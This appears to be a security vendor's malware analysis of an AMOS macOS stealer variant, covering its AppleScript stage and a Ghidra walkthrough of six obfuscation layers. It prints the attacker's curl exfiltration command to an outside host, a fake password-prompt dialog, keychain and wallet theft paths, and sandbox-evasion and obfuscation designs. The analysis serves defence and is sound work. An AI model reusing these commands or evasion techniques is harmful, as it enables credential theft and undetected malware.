
Anatomy of an Unknown AMOS Stealer: From Alert to Immunity in Hours

A previously undocumented AMOS stealer variant compromised a macOS endpoint. No known hashes, no C2 data in any public database. Our SOC dismantled six layers of obfuscation, extracted every indicator, and pushed protection to all SOC customers within hours, before the wider industry had even seen the sample.


When an alert fires in our SOC, the clock starts. But not just for the affected customer, for every customer we protect. In the modern threat landscape, the most dangerous moment for any organization is the intelligence gap: that window of time between a new malware variant being deployed and the rest of the world finding out it exists.

For a standalone security team, this gap is a period of extreme vulnerability. You are essentially waiting for a vendor update or a public signature feed that hasn't been written yet. But for our customers, that gap is closed by the power of our in-house developed Shared Threat Intelligence.

This blog post is the technical breakdown of how we dismantled a previously undocumented AMOS (Atomic macOS Stealer) variant. It's a story of moving from a single compromised endpoint to rapid deployment of detection and blocking capabilities across customer environments.


The Incident: An Unknown-IOC Scenario

The alert arrived on March 12, 2026 at 06:25 local time. A macOS endpoint had been compromised. By the time our SOC began analysing the artefacts, we were looking at a situation every threat analyst dreads: no known file hashes, C2 IP addresses, or meaningful behavioral signatures existed in public databases at the time of detection.

The full architecture of the attack only became clear during the subsequent deep-dive analysis. We discovered that the infection relied on a 15.7 MB macOS Universal Binary (x86_64 and ARM64) dropped at /private/tmp/helper. This sample was not readily available on the system; our team had to reconstruct the infection chain and simulate the original delivery request to manually retrieve the binary from the attacker's infrastructure.


Stage 1: Sandbox Checks

Before the malicious stealer itself was executed on the machine, an AppleScript payload had already executed. Every string in it, every file path, every shell command, every URL, was encoded using three custom arithmetic functions:

on ipbgcjzgqa(a, b)
    -- result[i] = chr(a[i] - b[i])
    
on kwcvvjininv(a, b)
    -- result[i] = chr(a[i] + b[i])
    
on xqylheckjx(a, b, offset)
    -- result[i] = chr(a[i] - b[i] - offset)
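The three routines can be restated as a short Python sketch. The function names are taken from the script; the arrays in the round-trip check below are invented for illustration, not recovered from the sample:

```python
# Python equivalents of the three AppleScript decode routines.
# Example key/data arrays are made up for demonstration only.

def ipbgcjzgqa(a, b):
    # result[i] = chr(a[i] - b[i])
    return "".join(chr(x - y) for x, y in zip(a, b))

def kwcvvjininv(a, b):
    # result[i] = chr(a[i] + b[i])
    return "".join(chr(x + y) for x, y in zip(a, b))

def xqylheckjx(a, b, offset):
    # result[i] = chr(a[i] - b[i] - offset)
    return "".join(chr(x - y - offset) for x, y in zip(a, b))

# Round trip with an invented key array: encode "curl", then decode it.
key = [10, 20, 30, 40]
encoded = [ord(c) + k for c, k in zip("curl", key)]
assert ipbgcjzgqa(encoded, key) == "curl"
```

Every string the script needs is stored as such integer arrays plus the matching key array, so a grep over the script body finds nothing.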

None of the strings appear anywhere in plaintext. What looked like meaningless integer arrays at first glance decoded, once we had reversed the encoding scheme, to a complete, fully operational data theft and exfiltration framework.

We decoded every array in the script statically. The results were unambiguous:

Download URL: https[:]//woupp[.]com/n8n/update
Exfil server: http[:]//92[.]246[.]136[.]14/contact
Exfil method: curl --connect-timeout 120 --max-time 300 -X POST -F "file=@/tmp/out.zip"

The download URL was deliberately crafted to impersonate a legitimate n8n workflow automation update, a tool commonly used by developers and DevOps engineers. This is not a random choice. It signals a targeted campaign aimed at technically sophisticated users, not generic end users who might install cracked software.

The Anti-Sandbox Check

Before any download occurred, the script ran a dedicated VM and sandbox detection routine. We also recovered a standalone anti-sandbox script from the incident artefacts:

set urgufr  to do shell script "system_profiler SPMemoryDataType"
set qcsvjxp to do shell script "system_profiler SPHardwareDataType"

The results were then checked against two lists. The first checked for virtualisation markers in memory data:

"QEMU"   "VMware"   "KVM"

The second checked hardware identifiers against a set of known analysis machine serial numbers:

"Z31FHXYQ0J"     -- known sandbox machine serial
"C07T508TG1J2"   -- known sandbox machine serial  
"C02TM2ZBHX87"   -- known sandbox machine serial
"Chip: Unknown"  -- emulation indicator
"Intel Core 2"   -- legacy/VM indicator

If any match was found: exit 100, complete termination. On a real MacBook Pro with an Apple Silicon chip, all checks pass silently and execution continues. This is a professional-grade sandbox evasion technique, and it was running before a single byte of the binary had been downloaded.
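The check reduces to simple substring matching over the system_profiler output. A minimal Python restatement, with the marker lists as recovered and the matching logic reconstructed:

```python
# Reconstruction of the sandbox check: substring matching over the
# output of `system_profiler SPMemoryDataType` / `SPHardwareDataType`.

VM_MARKERS = ("QEMU", "VMware", "KVM")
SANDBOX_MARKERS = ("Z31FHXYQ0J", "C07T508TG1J2", "C02TM2ZBHX87",
                   "Chip: Unknown", "Intel Core 2")

def is_analysis_machine(memory_info: str, hardware_info: str) -> bool:
    # Any hit in either profile aborts the infection (`exit 100`).
    return (any(m in memory_info for m in VM_MARKERS)
            or any(m in hardware_info for m in SANDBOX_MARKERS))
```

On genuine Apple Silicon hardware neither profile contains any of these markers, so the function returns False and the chain continues.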

Simple but effective privilege escalation: The fake password dialog

The decoded script also contained the text used for privilege escalation via social engineering:

Title:   "Application wants to install helper"
Prompt:  "Required Application Helper. Please enter device
          password to continue."
Button:  "Continue"

This dialog is displayed using a standard macOS display dialog call with the "with hidden answer" option, visually indistinguishable from a legitimate macOS authorisation prompt. The entered password was used to invoke login -pf <username>, elevating the process to root before the binary was ever executed.

What the Script Collected

Once the binary had run, the osascript continued its own collection workflow, targeting every category of sensitive data on the system. We decoded all collection paths and targets:

Browser data (all Chromium browsers + Safari):

/Login Data          /Cookies            /Web Data
/Local Extension Settings/   /IndexedDB/   /Local Storage/leveldb/

macOS Keychain:

~/Library/Keychains/login.keychain-db  -- accessed directly via cat

Apple Notes

Complete content exported as HTML with count header

Local files

Desktop and Documents, up to 30 MB, targeting:

pdf  doc  docx  xls  xlsx  ppt  pptx  txt  rtf
key  p12  pem  cert  pfx  sql  db  sqlite
json  xml  yaml  conf  env  csv

Cryptocurrency wallets

A hardcoded list of 200+ browser extension IDs targeting every major wallet including MetaMask, Coinbase Wallet, TronLink, Phantom, Keplr, Yoroi, Ledger Live, Trezor Suite, XDEFI, and Exodus.

After collection, everything was staged in a randomly-named temporary directory and sent:

ditto -c -k --sequesterRsrc <staging_dir> /tmp/out.zip
curl --connect-timeout 120 --max-time 300 -X POST \
  -H "user: <uuid>" -H "BuildID: <hw_profile>" \
  -F "file=@/tmp/out.zip" laislivon[.]com/contact

Cleanup followed immediately:

rm -r <staging_dir>
rm /tmp/out.zip

Stage 2: Reverse Engineering the 'helper' Binary

The helper binary is where this analysis gets deep. This is a purpose-built, professionally obfuscated macOS executable designed to be as difficult as possible to analyse statically, and it is the part of this investigation that required the most significant reverse engineering effort.

All analysis was performed using Ghidra with our custom ARM64 analysis workflow.

File Properties

Property Value
Format Mach-O Universal Binary
Architectures x86_64 (offset 0x1000) + ARM64 (offset 0x7ec000)
Size 15.7 MB
MD5 4599fdf2fa2099b30d8bbf76703dd634
SHA-1 3992edfb6f885ae5f09f3e69a2578048d6d5bb54
SHA-256 5664800f21d63e448b934bfcdc258b0c7dadb36e88cf4dd71b24e19656a2b78d

It Starts Before main()

The first thing we confirmed in Ghidra was that this binary does not behave like a normal executable. The real entry point is not main(). It is a function registered in __mod_init_func, a macOS mechanism that instructs the dynamic linker (dyld) to execute designated functions automatically when the binary is loaded, before any user-visible code runs.

The init function at 0x10009f384 is the true entry point of the malware. Ghidra's decompiler output:

// FUN_10009f384 @ 0x10009f384
// __mod_init_func registered — executes before main()
void FUN_10009f384(void)
{
    int iVar1;

    // Anti-sandbox delay: usleep(0x37e) = 894 microseconds
    iVar1 = _usleep(0x37e);

    // Indirect jump table — 14-state machine
    // Defeats CFG reconstruction in static analysis tools
    (*(code *)((ulong)switchD_10009f43c::switchdataD_1000cd3fc * 4 + 0x10009f440))(iVar1);
    return;
}

Two things are immediately notable. First, the 894-microsecond usleep at startup, an anti-sandbox timing signal. Second, and more significantly, the indirect jump table at 0x10009f43c. This is a computed branch where the target address is calculated at runtime from a lookup table. Static analysis tools cannot reconstruct the control flow graph from this; Ghidra itself logs multiple "unreachable block" warnings as it tries and fails to trace the execution path. This is deliberate.

The jump table drives a 14-state execution machine. Each state performs one discrete step of the decryption and execution pipeline. The state counter is updated after each step, and the machine loops until all states have executed.

The ARM64 Disassembly of the State Dispatcher

10009f3fc:  stp xzr,xzr,[sp, #0x48]
10009f41c:  mov w0,#0x37e
10009f420:  bl  0x1000a0fa8          ; _usleep(0x37e) — 894µs anti-sandbox
10009f424:  cmp w25,#0xd             ; state counter < 14?
10009f428:  b.hi 0x10009fd44         ; exit if done
10009f42c:  mov w8,w25               ; current state index
10009f430:  adr x9,0x10009f440       ; base of jump table
10009f434:  ldrh w10,[x20, x8, LSL#1]; load jump offset from table
10009f438:  add x9,x9,x10, LSL #0x2  ; compute target address
10009f43c:  br x9                    ; indirect branch, CFG broken here

Six Obfuscation Layers, Stacked

The binary uses six distinct obfuscation layers, stacked and chained so that the output of each feeds the next. Every payload, every string, every internal constant is encoded. Nothing meaningful appears in plaintext anywhere in the __const segment. What follows is a complete layer-by-layer breakdown, verified directly in Ghidra, down to the individual ARM64 instructions. While each individual technique used in this binary is known in isolation, their chained application across multiple stages created a highly interdependent execution flow that significantly increased the complexity of static and dynamic analysis.


Layer 1 — Compile-Time Triplet Encoding

Every string in the binary is stored not as characters, but as a sequence of 12-byte arithmetic triplets. Each triplet (a, b, shift) encodes exactly one output character. The encoding scheme is applied at compile time — meaning no string ever exists as plaintext in the binary, not even transiently during loading.

Two separate decoder functions handle different string sizes. FUN_100087c08 at 0x100087c08 decodes 60-character strings (720 bytes of input data from DAT_1006292cc). FUN_10007ad80 at 0x10007ad80 decodes 56-character strings (672 bytes from DAT_10049708c). Both use the identical algorithm.

// FUN_100087c08 @ 0x100087c08
// Triplet decoder, 60 chars, data from DAT_1006292cc
void FUN_100087c08(long *param_1)
{
    long *plVar1;
    void *pvVar2;
    long lVar3;
    uint *puVar4;

    pvVar2 = operator_new(0x2d0);            // allocate 720 bytes (60 triplets × 12)
    _memcpy(pvVar2, &DAT_1006292cc, 0x2d0);  // copy encoded triplets from __const
    FUN_1000a0840(param_1, 0x3c, 0);         // init 60-char output buffer
    lVar3 = 0;
    puVar4 = (uint *)((long)pvVar2 + 8);
    do {
        plVar1 = (long *)*param_1;
        if (-1 < *(char *)((long)param_1 + 0x17)) {
            plVar1 = param_1;
        }
        // THE DECODE FORMULA, one character per triplet:
        // char = (((b * 3) XOR a) >> shift) - b
        *(char *)((long)plVar1 + lVar3) =
            (char)((int)(puVar4[-1] * 3 ^ puVar4[-2]) >> (*puVar4 & 0x1f)) - (char)puVar4[-1];
        lVar3 = lVar3 + 1;
        puVar4 = puVar4 + 3;                 // advance 12 bytes — next triplet
    } while (lVar3 != 0x3c);                 // loop exactly 60 times
    operator_delete(pvVar2);
    return;
}

And the corresponding ARM64 assembly, each instruction maps directly to one operation in the formula:

100087c48:  add x9,x20,#0x8
100087c4c:  ldp w10,w11,[x9, #-0x8]   ; load a → w10,  b → w11
100087c50:  add w12,w11,w11, LSL #0x1 ; w12 = b + (b << 1) = b * 3
                                       ; (compiler avoids MUL instruction)
100087c54:  eor w10,w12,w10           ; w10 = (b*3) XOR a
100087c58:  ldr w12,[x9], #0xc        ; w12 = shift value; post-increment by 12
100087c5c:  asr w10,w10,w12           ; arithmetic right shift — sign bit preserved
100087c60:  sub w10,w10,w11           ; subtract b — final decoded character
100087c74:  strb w10,[x11, x8, LSL ]  ; store one byte to output buffer
100087c78:  add x8,x8,#0x1
100087c7c:  cmp x8,#0x3c              ; loop counter vs. 60
100087c80:  b.ne 0x100087c4c          ; continue until all 60 chars decoded

One detail worth noting: the multiplication b × 3 is implemented as add w12, w11, w11, LSL #1, a shift-and-add that avoids a multiplication instruction entirely. This is a classic compiler optimisation that also makes the code harder to pattern-match in signature databases.

The complete decode formula:

char = ASR( (b × 3) XOR a, shift ) − b

The ASR (arithmetic shift right) is critical. It preserves the sign bit. If the intermediate result of (b×3) XOR a is negative, which it frequently is, a logical shift would produce a different result entirely. This is intentional, and means that simply reimplementing the formula with >> in a higher-level language will silently produce wrong output unless the signed arithmetic is handled correctly.

The 56-character variant FUN_10007ad80 is structurally identical, operating on DAT_10049708c with a loop limit of 0x38. Both functions were confirmed live from Ghidra during this analysis.
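A faithful reimplementation must force the 32-bit two's-complement interpretation before shifting; Python's >> is arithmetic on plain ints, but only once the sign has been recovered. A sketch of the formula (the triplet values in the check below are constructed for illustration, not taken from DAT_1006292cc):

```python
def asr32(value: int, shift: int) -> int:
    # Interpret as 32-bit two's complement, then shift arithmetically.
    value &= 0xFFFFFFFF
    if value & 0x80000000:          # sign bit set → negative value
        value -= 0x100000000
    return value >> shift           # Python's >> on ints preserves sign

def decode_triplet(a: int, b: int, shift: int) -> str:
    # char = ASR((b * 3) XOR a, shift & 0x1f) - b, truncated to one byte
    return chr((asr32(((b * 3) ^ a) & 0xFFFFFFFF, shift & 0x1F) - b) & 0xFF)
```

The second branch in asr32 is exactly what a naive reimplementation misses: with a logical shift, every triplet whose intermediate value is negative decodes to garbage.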


Layer 2 — Hex String Encoding

The raw bytes produced by Layer 1 are themselves ASCII hex characters, not binary data. The output of a Layer 1 triplet decode is a string of hex pairs: 32694e5462.... This is confirmed by the decoder function FUN_100000dc0 at 0x100000dc0, which implements a hex-decode using a lookup table at DAT_1007bb591.

The Ghidra decompile shows a switch statement mapping each hex character (0x30-0x39, 0x41-0x46, 0x61-0x66) to its nibble value, assembling output bytes two characters at a time:

// FUN_100000dc0 @ 0x100000dc0
// Hex decoder, processes input two characters per output byte
switch(*(undefined1 *)((long)plVar2 + lVar7)) {
case 0x30:               break;              // '0' → 0x00
case 0x31: bVar9 = 0x10; break;              // '1' → 0x10
case 0x32: bVar9 = 0x20; break;              // '2' → 0x20
// ... '3' through '9' ...
case 0x41: case 0x61: bVar9 = 0xa0; break;   // 'A'/'a' → 0xa0
case 0x42: case 0x62: bVar9 = 0xb0; break;   // 'B'/'b' → 0xb0
case 0x43: case 0x63: bVar9 = 0xc0; break;   // 'C'/'c' → 0xc0
case 0x44: case 0x64: bVar9 = 0xd0; break;   // 'D'/'d' → 0xd0
case 0x45: case 0x65: bVar9 = 0xe0; break;   // 'E'/'e' → 0xe0
case 0x46: case 0x66: bVar9 = 0xf0; break;   // 'F'/'f' → 0xf0
}
// Second nibble from lookup table at DAT_1007bb591
*(byte *)((long)pppppppuVar3 + uVar8) = (&DAT_1007bb591)[(ulong)uVar4 & 0xff] | bVar9;

The ARM64 assembly drives this with a secondary computed-branch table, effectively implementing a 55-entry jump table for the switch:

100000e5c:  adr x17,0x100000e6c      ; base of case-dispatch table
100000e60:  ldrb w0,[x12, x16, LSL ] ; load offset for this hex char
100000e64:  add x17,x17,x0, LSL #0x2 ; compute dispatch address
100000e68:  br x17                   ; jump — second computed branch in 24 bytes

Two computed branches within a 24-byte window. Static analysis tools struggle badly with this pattern because both targets are unknown at analysis time.

A 137,208-character hex string decodes to 68,604 bytes. These 68,604 bytes then feed Layer 3.
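Functionally this layer is ordinary hex decoding; only the implementation is obfuscated. In Python the same transformation is a single call, shown here on the example prefix quoted above:

```python
layer1_output = "32694e5462"          # ASCII-hex prefix from the sample
layer2_bytes = bytes.fromhex(layer1_output)

assert layer2_bytes == b"2iNTb"                       # two hex chars → one byte
assert len(layer2_bytes) == len(layer1_output) // 2   # hence 137,208 → 68,604
```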


Layer 3 — Custom 16-Symbol Nibble Alphabet

The 68,604 output bytes from Layer 2 use only 16 unique byte values, drawn from two non-contiguous ASCII ranges:

  • 0x20-0x2F: space, !, ", #, $, %, &, ', (, ), *, +, ,, -, ., /
  • 0x78-0x7F: x, y, z, {, |, }, ~, DEL

This is a deliberate choice. In a hex editor, these bytes look like whitespace, punctuation, and end-of-ASCII-range characters — they blend into what looks like metadata or padding, not encoded data. A human analyst doing a quick visual scan of a hex dump will not flag these byte ranges as suspicious. Standard entropy analysis will also undercount the effective entropy because the byte distribution appears non-random.

Each byte from this alphabet encodes one nibble of the actual payload. The alphabet-to-nibble mapping is applied by the encode/decode function FUN_100000d60, which we confirmed at 0x100000d60. It chains two sub-functions: FUN_100000b50 builds an indexed map of the input string's characters, and FUN_100000c34 walks this map, consuming 4 bits per step and accumulating output bytes 8 bits at a time:

// FUN_100000c34 @ 0x100000c34, nibble accumulator
iVar5 = 0;
do {
    local_52 = *(undefined1 *)puVar4;
    lVar3 = FUN_1000a078c(param_3, &local_52);     // look up nibble value
    if (lVar3 == 0) {
        // character not in alphabet, treat as raw
        FUN_1000a078c(param_3, &local_51);
    }
    else {
        iVar5 = iVar5 + 4;                         // accumulate 4 bits
        while (7 < iVar5) {
            std::string::push_back((char)param_1); // emit byte when 8+ bits ready
            iVar5 = iVar5 + -8;
        }
    }
    puVar4 = (undefined8 *)((long)puVar4 + 1);
} while (puVar4 != puVar1);

The 34,302 bytes that emerge from this pass are 99.7% printable ASCII, the payload at this stage looks like a large shell script or configuration blob to a superficial inspection.
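The accumulator logic can be sketched in a few lines of Python. The real symbol-to-nibble table is baked into the binary; the alphabet ordering used below is a placeholder, chosen only so the sketch is runnable:

```python
# Sketch of the Layer 3 nibble decode. The actual symbol→nibble mapping
# lives in the binary; this ordering is a stand-in for illustration.
ALPHABET = bytes(range(0x20, 0x28)) + bytes(range(0x78, 0x80))  # 16 symbols
NIBBLE = {sym: i for i, sym in enumerate(ALPHABET)}

def decode_nibbles(data: bytes) -> bytes:
    out, acc, bits = bytearray(), 0, 0
    for sym in data:
        if sym not in NIBBLE:
            continue                      # out-of-alphabet bytes are skipped
        acc = (acc << 4) | NIBBLE[sym]    # accumulate 4 bits per symbol
        bits += 4
        if bits >= 8:                     # emit a byte once 8 bits are ready
            bits -= 8
            out.append((acc >> bits) & 0xFF)
    return bytes(out)
```

Two alphabet symbols collapse into one payload byte, which is why the 68,604 Layer 2 bytes shrink to roughly half their size at this stage.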


Layer 4, Compile-Time String Obfuscation

Short strings used internally are obfuscated at compile time using the same triplet scheme as Layer 1. These strings are reconstructed at runtime immediately before use and never persist in memory, they are consumed by the next operation and then the buffer is freed. At no point is a decoded string visible in the binary's static data sections.

The string hash function FUN_100000730 provides a secondary obfuscation layer for string comparisons. Rather than comparing strings directly, which would leave plaintext in memory for pattern-matching, the binary computes and compares integer hashes:

// FUN_100000730 @ 0x100000730
// FNV-style string hash, avoids plaintext string comparisons
int FUN_100000730(char *param_1)
{
    int iVar4 = 0x19a8;   // FNV offset basis (modified)
    // ...
    for (; uVar3 != 0; uVar3 = uVar3 - 1) {
        iVar4 = (int)*pcVar1 + iVar4 * -0x7fb91be3;  // FNV-1a style multiply
        pcVar1 = pcVar1 + 1;
    }
    return iVar4;
}

The ARM64 implementation replaces the multiply with a fused multiply-add:

100000744:  mov w0,#0x19a8            ; FNV basis
100000750:  mov w10,#0xe41d
100000754:  movk w10,#0x8046, LSL #16 ; constant = 0x8046e41d = -0x7fb91be3
100000758:  ldrsb w11,[x8], #0x1      ; load char, post-increment
10000075c:  madd w0,w0,w10,w11        ; w0 = w0 * 0x8046e41d + char
100000760:  subs x9,x9,#0x1
100000764:  b.ne 0x100000758

This means that even comparing two strings inside the binary never produces a branch that a debugger can intercept cleanly at the string level — only at the hash level.
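Restated in Python with the sign-extended byte load (ldrsb) modeled explicitly, and using the constants straight from the disassembly (0x8046E41D is the unsigned form of -0x7fb91be3):

```python
def string_hash(data: bytes) -> int:
    h = 0x19A8                                   # modified offset basis
    for c in data:
        if c >= 0x80:
            c -= 0x100                           # ldrsb: sign-extend the byte
        h = (h * 0x8046E41D + c) & 0xFFFFFFFF    # madd w0,w0,w10,w11
    return h
```

Any comparison target in the binary can then be stored as a single 32-bit constant instead of a string, and no plaintext ever reaches memory.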


Layer 5 — Dual-Instance Custom Stream Cipher

This is where the obfuscation architecture becomes genuinely unusual. There are not one but two separate cipher instances running in the binary, each with a different hardcoded lookup table and a different starting counter. Both use the same algorithm structure, but they produce different output alphabets for different parts of the payload pipeline.

Instance A, FUN_10007ab34 at 0x10007ab34:

// Instance A, start counter 0x4c, table @ 0x100496f8b
uVar6 = 0x4c;
do {
    bVar2 = *(byte *)((long)local_e0 +
            ((ulong)(*(byte *)((long)local_c8 + uVar5) ^ uVar6) & 0xff));
    *(byte *)((long)plVar1 + uVar5) = bVar2;
    uVar6 = (int)uVar5 + (uVar6 ^ bVar2);   // counter: i + (counter XOR output)
    uVar5 = uVar5 + 1;
} while (uVar7 != uVar5);

Instance B, FUN_10007a7e0 at 0x10007a7e0:

// Instance B, start counter 0x9f, different table @ 0x100496e0a region
uVar6 = 0x9f;
do {
    bVar2 = *(byte *)((long)local_c0 +
            ((ulong)(*(byte *)((long)local_a8 + uVar5) ^ uVar6) & 0xff));
    *(byte *)((long)plVar1 + uVar5) = bVar2;
    uVar6 = (int)uVar5 + (uVar6 ^ bVar2);   // identical counter update formula
    uVar5 = uVar5 + 1;
} while (uVar7 != uVar5);

The algorithm is structurally identical but the starting counter differs (0x4c vs 0x9f) and the lookup tables are at different memory addresses. Instance A is called from state 11 of the state machine to produce the encoding alphabet for the first payload path. Instance B is called from state 6 to produce the alphabet for the large shell script payload decode.

To be precise about what this cipher is: it is a substitution cipher with a counter-dependent index. Each output byte is a table lookup where the index is (input_byte XOR counter) & 0xFF. The counter updates as counter = (i + (counter XOR output)) & 0xFF after each byte, meaning each output byte feeds back into determining the next lookup index. This creates a dependency chain across the entire output sequence: you cannot decrypt byte N without having correctly decrypted bytes 0 through N−1. This property makes partial decryption or fault analysis significantly harder.

Neither instance is standard RC4. There is no S-Box initialisation phase and no S-Box swap operation. The lookup tables are static, pre-computed constants baked into the binary at compile time.
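The cipher structure can be restated compactly. The 256-byte lookup table below is a placeholder permutation; the real tables are the constants at 0x100496f8b and 0x100496e0a in the binary:

```python
# Stand-in permutation table; the genuine tables are baked into the binary.
TABLE = bytes((i * 167 + 13) & 0xFF for i in range(256))

def stream_decode(data: bytes, counter: int) -> bytes:
    out = bytearray()
    for i, b in enumerate(data):
        o = TABLE[(b ^ counter) & 0xFF]       # index = input XOR counter
        out.append(o)
        counter = (i + (counter ^ o)) & 0xFF  # feedback through the output byte
    return bytes(out)

# Instance A starts with counter 0x4c, Instance B with 0x9f.
```

Because each output byte feeds the next counter value, flipping any single input byte corrupts everything after it, which is exactly the dependency chain described above.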


Layer 6 — Runtime XOR with Exit-Code Dependent Key

The final and most analytically defeating layer applies an in-place XOR transformation to the Stage 2 payload. The XOR key is not hardcoded. It is computed at runtime from the exit code of the first shell payload execution, meaning it cannot be determined by any form of static analysis. The binary must actually execute, the first shell script must run to completion, and only then does the key exist.

The key derivation sequence in the ARM64 state machine dispatcher:

; After shell_exec_via_pipe #1 returns, exit code is in w0
10009f838:  ubfx w8,w0,#0x8,#0x8     ; extract bits [15:8] of exit status
10009f83c:  mov w9,#0x7f0             ; multiplier constant
10009f840:  madd w8,w8,w9,w26         ; key = (exit_byte × 0x7f0) + base_counter
10009f844:  and w24,w8,#0xffff        ; mask to 16-bit key → stored in w24

The XOR loop that processes the Stage 2 payload:

; In-place XOR, every byte of the payload is XORed with w24
10009fc34:  ldrb w10,[x8, x9, LSL ]  ; load payload byte
10009fc48:  eor w10,w10,w24          ; XOR with key
10009fc4c:  strb w10,[x8, x9, LSL ]  ; write decrypted byte in place

The key is a 16-bit value derived from the exit status byte of the first shell payload, multiplied by 0x7f0 and added to the current value of the state machine's base counter register w26. The multiplication constant 0x7f0 means that even a single-bit difference in the exit code produces a completely different key, there is no exploitable continuity between adjacent key values.

Without executing the binary in a controlled environment and capturing the exact exit code of the first shell payload, the Stage 2 payload is permanently opaque to static analysis. This is the single hardest barrier we encountered in this entire analysis.
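Given a captured wait() status and the base counter, the derivation is trivial to replay. A sketch following the disassembly above (the base_counter lives in register w26 at runtime and is not recoverable statically; the values in the check below are illustrative):

```python
def derive_key(wait_status: int, base_counter: int) -> int:
    exit_byte = (wait_status >> 8) & 0xFF               # ubfx w8,w0,#0x8,#0x8
    return (exit_byte * 0x7F0 + base_counter) & 0xFFFF  # madd + and → 16-bit key

def xor_payload(payload: bytes, key: int) -> bytes:
    # ldrb/eor/strb operate byte-wide, so only the key's low byte reaches the data
    return bytes(b ^ (key & 0xFF) for b in payload)
```

Note that the exit byte is taken from bits [15:8] of the raw wait status, which on macOS is where a normally-exiting child's exit code lands.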


Shell Execution: Pipes, Not Arguments, and SIMD XOR

The shell execution function FUN_10000091c at 0x10000091c is architecturally the most interesting piece of the binary. It is where everything comes together, the decoded payload, the obfuscated command name, and the deliberate anti-forensic design. Every individual design decision in this function is intentional and serves a specific evasion purpose.

Step 1: The command name is never in plaintext

The string /bin/zsh does not exist anywhere in the binary. It is stored in the __cstring section at 0x1007bb5c8 as the obfuscated bytes \x01LG@\x01T]F. The decoding happens at runtime using a single XOR operation, confirmed directly in the ARM64 assembly:

; FUN_10000091c — command name decode via SIMD XOR
100000960:  adrp x8,0x1007bb000
100000964:  add x8,x8,#0x5c8          ; x8 → "\x01LG@\x01T]F" in __cstring
100000968:  ldr x8,[x8]               ; load 8 obfuscated bytes as uint64
10000096c:  str x8,[sp, #0x20]
100000970:  strb wzr,[sp, #0x28]      ; null terminator

100000974:  ldr d0,[sp, #0x20]        ; load into SIMD register d0
100000978:  movi v1.8B,#0x2e          ; broadcast 0x2e to all 8 lanes of v1
10000097c:  eor v0.8B,v0.8B,v1.8B    ; XOR all 8 bytes simultaneously
100000980:  str d0,[sp, #0x20]        ; store decoded "/bin/zsh"

100000988:  mov w8,#0x732d            ; 0x732d = "-s" (little-endian)
10000098c:  strh w8,[sp, #0x4]        ; store argument string

The XOR key is 0x2e, the ASCII value of . (period). The decode is performed in a single eor v0.8B, v0.8B, v1.8B, an ARM64 NEON vector instruction that XORs all 8 bytes of the string simultaneously. Using a SIMD instruction for a simple 8-byte decode is unusual and serves two purposes: it is faster than a byte-by-byte loop, and it generates a fundamentally different instruction pattern that signature-matching tools trained on scalar decode loops will not flag.

The verification is trivial: 0x01 XOR 0x2e = 0x2f = /, 0x4c XOR 0x2e = 0x62 = b, 0x47 XOR 0x2e = 0x69 = i, 0x40 XOR 0x2e = 0x6e = n — producing /bin in the first four bytes.
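The full 8-byte decode can be replayed in two lines:

```python
obfuscated = b"\x01LG@\x01T]F"                 # bytes stored at 0x1007bb5c8
decoded = bytes(b ^ 0x2E for b in obfuscated)  # the NEON eor, one lane per byte
assert decoded == b"/bin/zsh"
```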

Step 2: The pipe architecture

After decoding the command name, the function creates an OS pipe and forks:

100000990:  bl 0x1000a0f6c    ; _fork()
100000994:  mov x20,x0        ; save PID
100000998:  cbz w0,0x100000b00 ; if child: jump to exec path

In the child process:

; Child process path
100000b0c:  mov w1,#0x0
100000b10:  bl 0x1000a0f48    ; _dup2(pipe_read_fd, STDIN=0)
; pipe read-end is now stdin, shell reads from pipe
100000b2c:  add x0,sp,#0x20   ; argv[0] = "/bin/zsh"
100000b30:  add x1,sp,#0x8    ; argv array
100000b34:  bl 0x1000a0f60    ; _execvp("/bin/zsh", ["/bin/zsh", "-s", NULL])

The child replaces its standard input with the read end of the pipe, then executes /bin/zsh -s. The shell in -s mode reads commands from stdin. From a process monitoring perspective, this process appears as /bin/zsh -s with no arguments — which is indistinguishable from a legitimate interactive shell session.
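The pattern is easy to reproduce. A minimal Python sketch of the pipe-to-stdin architecture, with the shell path parameterised so the snippet also runs where zsh is absent:

```python
import os

def run_via_pipe(script: bytes, shell: str = "/bin/zsh") -> int:
    """Feed a script to a shell over a pipe; the child shows up in process
    listings as `<shell> -s` with no command-line arguments."""
    r, w = os.pipe()
    pid = os.fork()
    if pid == 0:                          # child
        os.dup2(r, 0)                     # pipe read end becomes stdin
        os.close(w)
        os.execvp(shell, [shell, "-s"])   # shell reads commands from stdin
        os._exit(127)                     # only reached if exec fails
    os.close(r)                           # parent keeps only the write end
    os.write(w, script)
    os.close(w)                           # EOF tells the shell it is done
    return os.waitpid(pid, 0)[1]
```

No command text ever appears in argv, so process-creation telemetry that inspects command lines sees nothing but an idle shell.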

Step 3: Variable-size chunk writes

The parent process writes the decrypted payload to the pipe write end in deliberately variable-sized chunks:

; Parent: compute chunk size then write
1000009d4:  umulh x8,x23,x24       ; high-half multiply for modulo
1000009d8:  lsr x8,x8,#0x7
1000009dc:  msub x8,x8,x25,x23     ; x8 = length % 0xc0
1000009e0:  add x8,x8,#0x40        ; chunk = (length % 192) + 64
                                    ; range: 64 to 255 bytes per write
1000009e4:  cmp x8,x23             ; clamp to remaining length
1000009e8:  csel x2,x8,x23,cc

1000009ec:  ldr w0,[sp, #0x34]     ; pipe write fd
1000009f0:  mov x1,x21             ; payload pointer
1000009f4:  bl 0x1000a0fc0         ; _write(fd, buf, chunk_size)

100000a04:  mov w0,#0x1
100000a08:  bl 0x1000a0fa8         ; _usleep(1), 1µs between chunks
100000a0c:  add x21,x21,x22        ; advance pointer
100000a10:  sub x23,x23,x22        ; reduce remaining count
100000a14:  cbnz x23,0x1000009d4   ; loop until done

The chunk size formula (remaining_length % 192) + 64 produces values between 64 and 255 bytes per write call, varying with the remaining payload length. This variable-chunk approach means that the write pattern, visible in kernel event tracing tools like ktrace or dtrace, does not produce a recognisable fixed-size signature. Each execution of the same payload produces a different sequence of write() syscall sizes.
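The arithmetic in the disassembly reduces to a one-line formula; simulating a transfer shows the irregular write pattern directly:

```python
def chunk_size(remaining: int) -> int:
    # msub/add: (remaining % 0xc0) + 0x40, then cmp/csel clamps to what is left
    return min((remaining % 0xC0) + 0x40, remaining)

# Simulate writing a payload of illustrative length 1000 bytes.
sizes, remaining = [], 1000
while remaining:
    c = chunk_size(remaining)
    sizes.append(c)
    remaining -= c

assert sum(sizes) == 1000
assert all(s <= 255 for s in sizes)            # never more than 255 per write
assert all(s >= 64 for s in sizes[:-1])        # only the tail may fall below 64
```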

